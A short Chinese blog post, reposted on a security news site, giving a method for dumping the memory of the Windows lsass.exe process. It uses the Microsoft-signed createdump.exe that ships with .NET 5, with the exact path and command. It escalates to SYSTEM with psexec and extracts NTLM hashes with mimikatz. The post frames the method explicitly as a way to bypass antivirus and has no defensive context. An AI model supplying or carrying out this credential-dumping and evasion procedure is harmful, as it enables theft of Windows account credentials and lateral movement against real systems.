Dump lsass.exe 新思路

admin 2021年3月25日18:15:31Dump lsass.exe 新思路已关闭评论429 views字数 437阅读1分27秒阅读模式

今天在twitter上发现一个dump lsass新思路。bypass av哦。

createdump.exe是.NET5 自带的工具。
.NET5 安装程序下载地址:.NET5 下载连接

安装后文件路径
language
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.0\createdump.exe

dump 命令:
language
createdump.exe -u -f xxx.dump pid

pid 为dump程序的pid值

需要system权限,管理员权限执行会报错。error 5

Dump lsass.exe 新思路
解决方法,psexec获取system权限。

Dump lsass.exe 新思路
然后就可以dump lsass进程了。

Dump lsass.exe 新思路
成功了,我们在用mimikatz读取就行。

Dump lsass.exe 新思路

Dump lsass.exe 新思路
我是指纹解锁,所以密码为null。但是获取到了ntlm值。
因为createdump.exe是微软自家的,所以你懂的!
参考:https://twitter.com/jas502n/status/1366604098980614144

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月25日18:15:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Dump lsass.exe 新思路https://cn-sec.com/archives/299957.html